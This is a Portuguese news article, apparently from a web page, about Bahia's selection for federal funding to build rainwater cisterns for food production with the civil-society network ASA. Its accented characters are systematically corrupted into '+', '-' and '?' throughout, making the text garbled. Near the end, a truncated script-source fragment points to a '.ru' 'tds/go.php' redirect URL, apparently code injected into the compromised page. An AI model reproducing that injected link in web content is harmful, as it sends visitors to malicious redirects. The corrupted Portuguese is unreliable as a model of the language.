ASA Bahia é parceira do Governo do Estado na construção de tecnologias de captação de água para produção de alimentos

ASA Bahia é parceira do Governo do Estado na construção de tecnologias de captação de água para produção de alimentos

Compartilhe!

A Bahia foi selecionada em primeiro lugar no edital do Minist+rio de Desenvolvimento Social e Combate – Fome (MDS) para apoio – implementa+-o de tecnologias sociais de capta+-o de +gua para produ+-o de alimentos no Semi–rido. A proposta, formulada pela Secretaria de Desenvolvimento Social e Combate – Pobreza (Sedes), tem como objetivo construir cisternas de produ+-o, cujo funcionamento acontece atrav+s da +gua de enxurrada.


A Articula+-o do Semi–rido Brasileiro (ASA), que atualmente j+ + parceira do Governo da Bahia na constru+-o de cisternas de +gua para consumo humano, estar+ junto neste projeto novamente. +Essa sele+-o do MDS, classificando a Bahia, vem justamente ao encontro da pol+tica que j+ est+ acontecendo no Estado, que + levar para as fam+lias tamb+m a +gua para produ+-o de alimentos, em conjunto com a sociedade civil+, diz Naidison Baptista, coordenador da ASA pelo estado da Bahia. ++ uma alegria saber que teremos continuidade na proposta e, dessa forma, servir tamb+m como incentivo para que cada vez mais sejam implementadas a++es como essa+, complementa..


Segundo o coordenador t+cnico do Projeto Cisternas, pela Sedes, Danilo Chaves, o trabalho conjunto entre Estado e sociedade civil deve ser compreendido dentro de um contexto qualitativo. +O trabalho com a ASA tem contribu+do para uma nova configura+-o na gest-o da pol+tica p+blica de seguran+a alimentar e, no caso das cisternas, o projeto acontece atrav+s de novas metodologias, que efetivamente transformam a vida do sertanejo+, afirma Chaves.


Al+m da execu+-o das cisternas, a ASA contribui com metodologias pedag?gicas importantes para o envolvimento comunit+rio, potencializando a conviv+ncia digna com o Semi–rido. A participa+-o das fam+lias acontece desde o processo de sele+-o, passando pela participa+-o nos cursos de gerenciamento dos recursos h+dricos, e culminando na colabora+-o da pr?pria fam+lia na constru+-o das cisternas.


O secret+rio de Seguran+a Alimentar e Nutricional do MDS, Onaur Ruano, afirma que +o governo federal sozinho n-o faz pol+tica p+blica, a sociedade civil sozinha n-o faz pol+tica p+blica e, tamb+m, da mesma forma, os+ governos estaduais e municipais+.


A opini-o do governo federal + que se a pol+tica p+blica n-o for transformada em pol+tica de Estado, acabar+ se perdendo ao longo dos governos sucessores. +Ter a sociedade civil mobilizada, participante do processo, tamb+m atrav+s de conselhos municipais e regionais, com controle social, ou seja, com a participa+-o efetiva das organiza++es sociais nas pol+ticas p+blicas, representa um avan+o significativo para a qualidade dos projetos+, ressalta Ruano.

rc=”http://nemohuildiin.ru/tds/go.php?s

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *